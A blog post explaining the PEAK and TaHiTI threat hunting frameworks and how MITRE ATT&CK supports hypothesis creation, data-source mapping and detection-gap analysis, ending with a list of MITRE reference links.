Threat Hunt (TH) Programs - Understanding Threat Hunt Frameworks
- brencronin
- 14 hours ago
- 9 min read
Updated: 13 hours ago
Threat Hunting Frameworks
Threat hunting is a proactive cybersecurity discipline that requires structure, strategy, and context. Two of the most popular threat hunting frameworks are PEAK and TaHiTI, with the MITRE ATT&CK framework playing a foundational role across all threat hunting efforts.
PEAK stands for Prepare, Execute, and Act with Knowledge.
TaHiTI stands for Targeted Hunting Integrating Threat Intelligence.
MITRE ATT&CK, while not a hunting framework per se, is a crucial reference for Tactics, Techniques, and Procedures (TTPs) and serves as the tactical map behind most modern threat hunts.
A Note on IOC-Based Threat Hunting Indicator of Compromise (IOC)-based threat hunting, such as searching for specific IP addresses, file hashes, or domains, has its place, especially for known threats. However, these data sweeps should ideally be automated through tools like firewalls, EDR/XDR, or SIEM correlation rules. Threat hunting should focus beyond the basics, leveraging behavioral analysis, threat modeling, and hypotheses.
The PEAK Framework
PEAK organizes threat hunting into three stages:
Prepare
Execute
Act with Knowledge
It also outlines three types of hunts that can be conducted under these phases:
Hypothesis-Driven Threat Hunts
Baseline Threat Hunts
Model-Assisted Threat Hunts (M-ATH)
Hypothesis-Driven Threat Hunting
This approach starts by forming a logical hypothesis, such as:
“If adversaries are targeting remote access tools, then our organization may be at risk of RDP brute-force attacks using valid credentials.”
From there, the threat hunter investigates related indicators and behaviors in the environment.
Baseline Threat Hunting
Baseline threat hunting focuses on understanding what "normal" looks like in your environment, then identifying anomalies that could signal malicious activity. While establishing baselines is often one of the hardest to nail-down tasks in cybersecurity, it’s also one of the most valuable.
In practice, every threat hunt involves some form of implicit baselining. You’ve likely heard observations like, “This system talking to that system seems suspicious” or “This behavior is unusual for that endpoint.” These statements reflect a baseline, whether formally documented or informally understood.
True baseline threat hunting, however, takes this a step further. It involves explicitly defining expected behavior, such as:
System A should only communicate with System B over a specific port.
User accounts in Group X should never run administrative tools.
Workstations should not initiate outbound traffic to external IPs on non-standard ports.
Once these baselines are in place, the goal becomes clear: look for deviations that break the established norms. These deviations may indicate misconfigurations, insider threats, compromised assets, or shadow IT activity.
Model Assisted Threat Hunting
Model-Assisted Threat Hunting leverages machine learning and advanced analytics to identify anomalies or behavioral patterns that may signal malicious activity. This approach often involves building models that define what is considered "normal" or "malicious" behavior across systems, users, or network activity.
By using these models, threat hunters can proactively detect subtle indicators of compromise that might evade traditional rule-based detection. Some of the most widely used families of machine learning algorithms in this space include:
Classification - Classification algorithms are used to predict the category or class of a given data point (e.g., malicious vs. benign). These are typically supervised learning models trained on labeled datasets to recognize known patterns of good or bad behavior.
Clustering - Clustering groups similar data points together without prior labeling. It helps uncover hidden structures or relationships in the data. Different clustering algorithms use various methods to assess similarity and group data accordingly, making this approach effective for uncovering previously unknown threat patterns.
Time Series Analysis - Also known as forecasting, time series analysis involves analyzing sequences of data points collected over time. These algorithms are useful for identifying trends, seasonality, and sudden deviations that may suggest emerging threats or operational issues.
Anomaly Detection - Anomaly detection algorithms are designed to identify outliers, data points that deviate significantly from the norm. These can be statistical or machine learning-based and are effective in surfacing rare or unexpected behavior that may indicate compromise.
PEAK Threat Hunting – Scope and Planning
The PEAK threat hunting methodology incorporates the ABLE framework, which helps structure the investigative scope of a threat hunt.
ABLE stands for:
A – Actor
B – Behavior
L – Location
E – Evidence
The ABLE framework guides threat hunters in defining the core elements of the investigation. By identifying the threat actor (or suspected adversary), the behaviors associated with the threat, the systems or locations where those behaviors may occur, and the evidence required to confirm or refute the activity, hunters can more effectively focus their investigative efforts and define the scope of the threat hunt mission.
PEAK Threat Hunting – Execution
The Execution phase involves collecting, processing, and analyzing data relevant to the threat hunt hypothesis.
Data sources typically include SIEM telemetry, but may also incorporate additional sources such as endpoint telemetry, network logs, identity data, or other security platform data depending on the scope of the hunt.
During execution, threat hunters perform analytical activities including:
Query development and execution
Data correlation and filtering
Behavioral analysis
Data visualization
Pattern identification
All analytical techniques used during the hunt, such as queries, dashboards, and visualizations, should be documented for reproducibility and future reuse.
As the investigation progresses, findings may require refinement of the threat hunt hypothesis or expansion of the investigation scope. If evidence of potential malicious activity is identified, findings should be escalated to the appropriate incident response or SOC teams for further investigation.
PEAK Threat Hunting – Act
The Act phase focuses on operationalizing the results of the threat hunt.
Key activities include:
Preserving and documenting the threat hunt investigation, including queries, methodologies, and findings
Developing new detections or improving existing detections based on insights gained during the hunt
Updating the threat hunt backlog with new hypotheses or investigative opportunities identified during the mission
Communicating findings and analysis results to relevant stakeholders, including SOC teams, detection engineering teams, and leadership
This phase ensures that the knowledge gained from the threat hunt improves the organization’s long-term detection capabilities and overall security posture of the organization.
TaHiTI Threat Hunting Model
The Targeted Hunting Integrating Threat Intelligence (TaHiTI) model was developed by a consortium of Dutch financial institutions under the Dutch Payments Association (Betaalvereniging Nederland). Contributors included security professionals from de Volksbank, Rabobank, ING, ABN AMRO Bank, and members of FinancialCERT.
TaHiTI organizes the threat hunting process into three structured phases: Initiate, Hunt, and Finalize. One of the model’s key strengths is its grounding in real-world operational needs, particularly within large organizations.
TaHiTI - Phase 1: Initiate
The Initiate phase focuses on defining the reason and scope for the threat hunt. This begins with a trigger, which could come from executive directives, emerging threat intelligence, newly disclosed vulnerabilities, or recent incidents. In real-world environments, hunting teams often juggle requests from leadership while staying responsive to the latest threats.
To manage these demands effectively, TaHiTI encourages the creation of an investigation abstract, a concise, high-level summary that clearly communicates the rationale behind the hunt. This abstract becomes a crucial tool for aligning technical efforts with organizational priorities and maintaining transparency with stakeholders.
Another important aspect of this phase is prioritization. Not every trigger demands immediate action. The team must evaluate whether the new hunt should take precedence over existing efforts or be added to a backlog of scheduled threat hunts. Having a structured intake and prioritization process ensures resources are allocated where they can provide the most value.
The figure below categorizes common triggers that initiate threat hunting activities:
Threat Intelligence - Intelligence feeds are one of the most powerful sources for initiating threat hunts. Indicators of compromise (IOCs), adversary TTPs, and campaign reports can all highlight areas worth deeper investigation.
Ongoing Threat Hunts - Threat hunting can be recursive, findings from one hunt often uncover anomalies or patterns that spark new investigations. This iterative approach helps deepen threat visibility over time.
Security Monitoring - The TaHiTI model emphasizes strong integration with an organization’s security monitoring capabilities. Alerts, suspicious patterns, or telemetry gaps identified through SIEMs or EDR tools can all trigger targeted threat hunts.
Incident Response (IR) - Active incidents or red team exercises frequently expose blind spots or threat behaviors worth investigating further. These insights serve as rich sources for generating new hunt hypotheses.
Other Organizational Drivers - Several additional factors can trigger threat hunts, including:
Crown Jewel Analysis (protecting mission-critical assets)
Domain Expertise (knowledge from SMEs or SOC analysts)
MITRE ATT&CK Mapping (identifying gaps or TTP coverage)
Executive Directives (risk-based decisions from leadership)
Emerging Vulnerabilities and Exploits (new threats in the wild)
A well-structured threat hunt abstract helps ensure clarity, alignment, and traceability throughout the hunt lifecycle. The following components are essential:
Date - The date the abstract was created or the hunt was initiated.
Initial Hypothesis - A concise, testable hypothesis outlining the suspected threat or behavior being investigated.
Trigger - The event, intelligence, or insight that initiated the threat hunt. Include all relevant context and attach supporting artifacts (e.g., threat intel reports, detection alerts, IOC lists).
Hunt Priority - The urgency of the hunt, typically based on the potential threat level. Factors that influence priority may include:
Active threat campaigns targeting the organization or industry
Known adversary groups using relevant TTPs
Existing detection or prevention coverage
Observed exploitation in the wild
A clear and consistent abstract ensures stakeholders, technical and non-technical, can quickly understand the scope, rationale, and urgency of the threat hunt.
TaHiTI - Phase 2: Hunt
In the TaHiTI threat hunting model, Phase 2, the Hunt phase, consists of two closely integrated processes: Define/Refine and Execute.
Define/Refine involves expanding the initial threat hunt concept or abstract into a structured investigative plan. During this step, threat hunters enrich the original idea by incorporating relevant threat intelligence, defining or refining the investigative hypothesis, identifying the required data sources, and determining the analytical techniques that will be used during the hunt.
Once the hunt parameters are defined, the process moves into the Execute stage. During execution, analysts retrieve and analyze relevant telemetry to test and validate the hypothesis. This typically involves querying security data sources, correlating events, and examining behavioral patterns to determine whether evidence of the hypothesized activity exists.
The Define/Refine and Execute processes operate iteratively. As analysts analyze the data, new insights may emerge that require adjustments to the hypothesis, investigative scope, or analytical methods. When this occurs, the process cycles back to Define/Refine, where the hypothesis and investigation plan are updated before execution continues.
This iterative cycle continues until the hypothesis is validated, disproven, or the investigation reaches an acceptable level of analytical confidence.
TaHiTI - Phase 3: Finalize
One of the most impactful parts of the Finalize phase in a threat hunt is the handover, this is where the insights gained during the hunt are translated into actionable outcomes across the broader security organization. The handover is where threat hunting truly delivers its value.
Key Handover Areas:
Security Incident Response - If the hunt uncovered indicators of a real security incident, this information must be escalated immediately to the incident response team for containment, eradication, and recovery efforts.
Security Monitoring - Recommendations for improving detection should be passed to the security monitoring team. If new use cases or detection gaps were identified, provide actionable content, not vague suggestions commonly found in red team reports.
Don’t just say, “The organization needs better detection for attack XYZ.”
Instead, include detection logic, such as sample KQL queries or Sigma rules.
Also, evaluate and document false positive considerations to help the SOC tune these rules effectively.
Threat Intelligence - If the hunt revealed new Tactics, Techniques, or Procedures (TTPs) not previously documented, these should be integrated into the threat intelligence process. This keeps the organization’s CTI program current and relevant.
Vulnerability Management - If the hunt exposed exploitable misconfigurations, unpatched systems, or weak controls, hand these findings off to the vulnerability management or IT operations teams for remediation before attackers can take advantage.
Other Relevant Teams - Depending on the findings, there may be additional handovers to:
Network Security (e.g., for segmentation gaps)
Identity & Access Management (e.g., for privilege misuse)
Governance & Risk (e.g., if findings impact compliance posture)
Mitre Attack Framework
The MITRE ATT&CK framework organizes attacker behavior into:
Tactics – The adversary’s objective (e.g., Initial Access, Persistence, Command and Control)
Techniques – Methods used to achieve the tactic
Sub-techniques – Specific implementations of techniques
Threat hunters use ATT&CK to identify which adversary behaviors should be investigated within an environment.
Example:
ATT&CK Tactic | Example Technique | Threat Hunt Focus |
Persistence | Registry Run Keys | Hunt for unusual registry persistence |
Command & Control | Web Protocols | Hunt for suspicious outbound HTTP |
Credential Access | LSASS Memory Dumping | Hunt for abnormal credential access activity |
ATT&CK therefore acts as a behavioral library of attacker activity that threat hunters can investigate.
ATT&CK Drives Threat Hunt Hypothesis Creation
Many threat hunts begin with ATT&CK technique hypotheses.
Example hypothesis:
“If an attacker is attempting credential access using LSASS dumping (ATT&CK T1003), we should observe abnormal access to the LSASS process.”
The hunt then investigates telemetry such as:
Endpoint process access logs
EDR telemetry
Memory access patterns
Thus ATT&CK helps hunters move from abstract intelligence to concrete investigative queries.
ATT&CK Helps Map Data Sources
ATT&CK also provides guidance on data sources required to detect techniques, such as:
Process creation
Authentication logs
Network traffic
Registry activity
Threat hunting frameworks use this mapping to determine which telemetry should be queried during the hunt.
ATT&CK Enables Detection Gap Analysis
Another major relationship between ATT&CK and threat hunting frameworks is detection coverage analysis.
Threat hunters often perform: ATT&CK coverage mapping
Example:
Technique | Detection Coverage | Threat Hunt Need |
PowerShell execution | Partial | Conduct hunt |
Scheduled task persistence | None | High-priority hunt |
WMI lateral movement | Strong | Monitor |
Threat hunts are often launched specifically to validate coverage gaps identified in ATT&CK mappings.
ATT&CK Supports Detection Engineering After Hunts
After a threat hunt completes, findings are frequently converted into ATT&CK-mapped detections.
Example:
Threat Hunt Finding→ suspicious certutil download behavior
Detection created→ ATT&CK technique: Ingress Tool Transfer
This allows security programs to measure detection maturity against the ATT&CK framework.
ATT&CK Enables Threat Actor-Based Hunting
Many threat intelligence reports map threat actors to ATT&CK techniques.
Example mapping:
Threat Actor→ Techniques used→ Threat hunt targets
Threat hunters can then search for those specific behaviors in their environment.
This approach is commonly called ATT&CK-based threat hunting.
References
PEAK Threat Hunting Framework:
The PEAK Threat Hunting Template You'll Wish You Had Sooner
Tahiti Threat Hunting Model:
𝗔𝗧𝗧&𝗖𝗞 - Adversary TTPs - attack.mitre.org
𝗗𝟯𝗙𝗘𝗡𝗗 - Defensive Countermeasures - d3fend.mitre.org
𝗥𝗘&𝗖𝗧 - Incident Response - https://atc-project.github.io/react-navigator/
𝗘𝗡𝗚𝗔𝗚𝗘 - Deception & Engagement - https://engage.mitre.org/matrix/
𝗔𝗧𝗟𝗔𝗦 - AI/ML Security - https://atlas.mitre.org/matrices/ATLAS
𝗘𝗠𝗕𝟯𝗗 - Embedded Device Security - emb3d.mitre.org
𝗙𝗶𝗚𝗛𝗧 - 5G Infrastructure - fight.mitre.org
𝗖𝗥𝗘𝗙 - Cyber Resiliency - https://crefnavigator.mitre.org/navigator
ATT&CK Navigator - https://mitre-attack.github.io/attack-navigator/
Comments